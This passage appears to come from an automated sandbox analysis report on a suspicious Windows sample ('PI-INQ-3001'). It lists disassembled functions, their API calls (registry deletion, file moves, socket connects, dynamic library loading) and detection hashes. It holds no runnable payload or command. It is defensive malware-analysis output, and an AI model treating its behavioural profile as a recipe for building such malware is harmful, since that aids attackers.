                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 1ed7a71e0ab1a116f422bc1a2f8c375c68d1c2c483a70e8c388cf535a7439eda
                                          • Instruction ID: e6c8544934d547e1f660bb2515d5f8810a0982792e842cee1d65a8987915c230
                                          • Opcode Fuzzy Hash: 1ed7a71e0ab1a116f422bc1a2f8c375c68d1c2c483a70e8c388cf535a7439eda
                                          • Instruction Fuzzy Hash: 884190B6C2011876CB11EBB48C869CFB3A89F05311F50A856E918F3262E734E798C7A5
                                          Function 00E538AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E538D3,?), ref: 00E548C7
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E538D3,?), ref: 00E548E0
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E538F3
                                          • _wcscmp.LIBCMT ref: 00E5390F
                                          • MoveFileW.KERNEL32(?,?), ref: 00E53927
                                          • _wcscat.LIBCMT ref: 00E5396F
                                          • SHFileOperationW.SHELL32(?), ref: 00E539DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 5b8040066f8cd4af864361fbf9c99fc96e4eeaccde7979ce9b51ce2dd89d5b78
                                          • Instruction ID: fa7abf260f2c3132efa00c031e99be388c5a6343a4d8dd8f550c57489364e59a
                                          • Opcode Fuzzy Hash: 5b8040066f8cd4af864361fbf9c99fc96e4eeaccde7979ce9b51ce2dd89d5b78
                                          • Instruction Fuzzy Hash: A9418FB15083849EC751EF64D4819EFB7E8AF88385F002D2EB889E3191EA74D69CC752
                                          Function 00E77500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E77519
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E775C0
                                          • IsMenu.USER32(?), ref: 00E775D8
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E77620
                                          • DrawMenuBar.USER32 ref: 00E77633
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: e62c6771988dc61492074765ec0438885cd9cc587f635f5b665125c3b6c6cb3a
                                          • Instruction ID: a230a3b5a7b5fa115582d47a23d603beecce00fd57fc0f5c1665a830a28280cb
                                          • Opcode Fuzzy Hash: e62c6771988dc61492074765ec0438885cd9cc587f635f5b665125c3b6c6cb3a
                                          • Instruction Fuzzy Hash: E0412975A04609EFDB20DF95D884EAABBF8FB08314F049129ED99A7250D730AD54CFA0
                                          Function 00E7122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E7125C
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E71286
                                          • FreeLibrary.KERNEL32(00000000), ref: 00E7133D
                                            • Part of subcall function 00E7122D: RegCloseKey.ADVAPI32(?), ref: 00E712A3
                                            • Part of subcall function 00E7122D: FreeLibrary.KERNEL32(?), ref: 00E712F5
                                            • Part of subcall function 00E7122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E71318
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E712E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 7889089fe70cca041f8c01b9bf0b3ddc8474d57afa1ef7e2d9893a9bf8fda8a6
                                          • Instruction ID: 2f2ddc98fc2c49bd6c18dc7eec1cf30e6384ffde527e71b0af79a6682ed0c57a
                                          • Opcode Fuzzy Hash: 7889089fe70cca041f8c01b9bf0b3ddc8474d57afa1ef7e2d9893a9bf8fda8a6
                                          • Instruction Fuzzy Hash: 72315EB1901209BFDB14DB94DC89EFFB7BCEF08344F0041A9E509F2251DB749E899AA0
                                          Function 00E7653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E7655B
                                          • GetWindowLongW.USER32(017959C8,000000F0), ref: 00E7658E
                                          • GetWindowLongW.USER32(017959C8,000000F0), ref: 00E765C3
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E765F5
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E7661F
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E76630
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E7664A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: d8fbdcae20e6f959edbb465a86021f6f06f823063f90e20b6900d3b6c0efa736
                                          • Instruction ID: 28a4a32f440e1d0805b0fc3ebb9f10ebea43c95e95601ecab7518d63eaa63445
                                          • Opcode Fuzzy Hash: d8fbdcae20e6f959edbb465a86021f6f06f823063f90e20b6900d3b6c0efa736
                                          • Instruction Fuzzy Hash: 1A312631604510AFDB21CF59DC84F553BE1FB4A718F1852A8F509AB2B6CB71AC84EB91
                                          Function 00E66486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E664D9
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E664E8
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66521
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00E6652A
                                          • WSAGetLastError.WSOCK32 ref: 00E66534
                                          • closesocket.WSOCK32(00000000), ref: 00E6655D
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E66576
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 2446e2f52ed8d75041e83060fceecf3898da799f272b0b2d69a63dcb04b0df70
                                          • Instruction ID: f97b158cb2d6e52d00db033734e4726a4998cbfc5127c919b23091949b9cdece
                                          • Opcode Fuzzy Hash: 2446e2f52ed8d75041e83060fceecf3898da799f272b0b2d69a63dcb04b0df70
                                          • Instruction Fuzzy Hash: 1331A131650118AFEB10DF24EC85BBE7BACEB45754F048029FD1AB7291CB70AD48CB62
                                          Function 00E4E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E4E0FA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E4E120
                                          • SysAllocString.OLEAUT32(00000000), ref: 00E4E123
                                          • SysAllocString.OLEAUT32 ref: 00E4E144
                                          • SysFreeString.OLEAUT32 ref: 00E4E14D
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E4E167
                                          • SysAllocString.OLEAUT32(?), ref: 00E4E175
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 1969e9889fb2c8026e930ff47f3e4c69c972092a1a51775f3bd24c6772d233c7
                                          • Instruction ID: 6c0cbab0ac853abc8369bd33277a9917e835780d8e02f89c0bf70e83caae83ac
                                          • Opcode Fuzzy Hash: 1969e9889fb2c8026e930ff47f3e4c69c972092a1a51775f3bd24c6772d233c7
                                          • Instruction Fuzzy Hash: 9C217435605108AF9B10DFA9DC88CAB77ECFB09760B108135F919EB360EA70DC858B64
                                          Function 00E7783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E778A1
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E778AE
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E778B9
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E778C8
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E778D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: b646207f51cd88a96edb7e36beb201b53efd496ff628b2dd34694009d172c3cc
                                          • Instruction ID: 6a884e0af084a8593471ce6e7e553110c188bceac2d2fd1818f39431b93c14bf
                                          • Opcode Fuzzy Hash: b646207f51cd88a96edb7e36beb201b53efd496ff628b2dd34694009d172c3cc
                                          • Instruction Fuzzy Hash: 5C1181B1110229BFEF159E60CC85EE77F6DEF08798F019115F648A6090C7719C21DBA0
                                          Function 00E141C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E14292,?), ref: 00E141E3
                                          • GetProcAddress.KERNEL32(00000000), ref: 00E141EA
                                          • EncodePointer.KERNEL32(00000000), ref: 00E141F6
                                          • DecodePointer.KERNEL32(00000001,00E14292,?), ref: 00E14213
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 3489934621-340411864
                                          • Opcode ID: 45c31eaee3125327265d21a0c076f6a55cb7ac133a4bd6c47c674dd2ff2ac4f1
                                          • Instruction ID: 276f90441679baaa9e4c5599d9f5ae590ce71b92159e325e21b4e45e10b110d3
                                          • Opcode Fuzzy Hash: 45c31eaee3125327265d21a0c076f6a55cb7ac133a4bd6c47c674dd2ff2ac4f1
                                          • Instruction Fuzzy Hash: 7DE0E5F4A92300AFEB20ABBAEC09B453AA4AB20B06F505528F559F51F1DBB540D98B00
                                          Function 00E1429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E141B8), ref: 00E142B8
                                          • GetProcAddress.KERNEL32(00000000), ref: 00E142BF
                                          • EncodePointer.KERNEL32(00000000), ref: 00E142CA
                                          • DecodePointer.KERNEL32(00E141B8), ref: 00E142E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: 53c04542247e88984d15fe53932ca62106cbcf7b22ddbc6e4a9239f6325db5a3
                                          • Instruction ID: 813fd9d46ca6011c8bc337f83338ed86163a5c7b5ba3e6d7ef67a560b092ea02
                                          • Opcode Fuzzy Hash: 53c04542247e88984d15fe53932ca62106cbcf7b22ddbc6e4a9239f6325db5a3
                                          • Instruction Fuzzy Hash: F2E0BFBC982310AFEB10EB66FC0DB453AA4BB14746F105128F109F11F1CB7445C8CB14
                                          Function 00E5675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                          • Instruction ID: 3681b18dfdaf323aa6af8b077a3d0f33f5587af9c48ab76b4f3e98c1bc1c02e4
                                          • Opcode Fuzzy Hash: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                          • Instruction Fuzzy Hash: E061CE3190024A9BCF15EF20CC92FFE77A4EF48308F459859FE556B192DB70A889CB60
                                          Function 00E7046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70548
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E70588
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E705AB
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E705D4
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E70617
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70624
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 2094dd129cc9756e4aa45125e2831746bf43be0079e2f718364b36c5bfb63a5a
                                          • Instruction ID: 25b0b2d6a0565453d8f8eee377c212c9d258268414c01fd2473941824c9c640d
                                          • Opcode Fuzzy Hash: 2094dd129cc9756e4aa45125e2831746bf43be0079e2f718364b36c5bfb63a5a
                                          • Instruction Fuzzy Hash: 0A517A31508204EFC710EF64D885EAEBBE8FF88304F04891DF549A72A1DB31E954DB62
                                          Function 00E75A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenu.USER32(?), ref: 00E75A82
                                          • GetMenuItemCount.USER32(00000000), ref: 00E75AB9
                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E75AE1
                                          • GetMenuItemID.USER32(?,?), ref: 00E75B50
                                          • GetSubMenu.USER32(?,?), ref: 00E75B5E
                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E75BAF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountMessagePostString
                                          • String ID:
                                          • API String ID: 650687236-0
                                          • Opcode ID: 4608ffce9a0cdce1308aa1a240fbbd212991dbf031fccc5e18df5dc0a89f2938
                                          • Instruction ID: 648b626be4a7341f014754c96cb6fa4446b307638f42fd986e2973948f34d35d
                                          • Opcode Fuzzy Hash: 4608ffce9a0cdce1308aa1a240fbbd212991dbf031fccc5e18df5dc0a89f2938
                                          • Instruction Fuzzy Hash: E6518F32E00619EFCB15DFA4C845AAEB7F4EF48310F119469E919B7351CBB0AE41CB90
                                          Function 00E4F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E4F3F7
                                          • VariantClear.OLEAUT32(00000013), ref: 00E4F469
                                          • VariantClear.OLEAUT32(00000000), ref: 00E4F4C4
                                          • _memmove.LIBCMT ref: 00E4F4EE
                                          • VariantClear.OLEAUT32(?), ref: 00E4F53B
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E4F569
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: 69bf29abf5cf46c27d4866fcd8a43ed982b5a4afe4b8171783a6f34d75f9f111
                                          • Instruction ID: d46f97806f9daa8242d1a8546a640a73e4d082e2ce519d404c177635f6ce419b
                                          • Opcode Fuzzy Hash: 69bf29abf5cf46c27d4866fcd8a43ed982b5a4afe4b8171783a6f34d75f9f111
                                          • Instruction Fuzzy Hash: 525148B5A00209EFCB14CF58D884AAAB7F8FF4C354B158569E959EB310E734E951CBA0
                                          Function 00E526F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E52747
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E52792
                                          • IsMenu.USER32(00000000), ref: 00E527B2
                                          • CreatePopupMenu.USER32 ref: 00E527E6
                                          • GetMenuItemCount.USER32(000000FF), ref: 00E52844
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E52875
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 6ce66d664cb3224d9c1a254feca6ccc63a2c1dfd2dde3d3021a463d1a7772b74
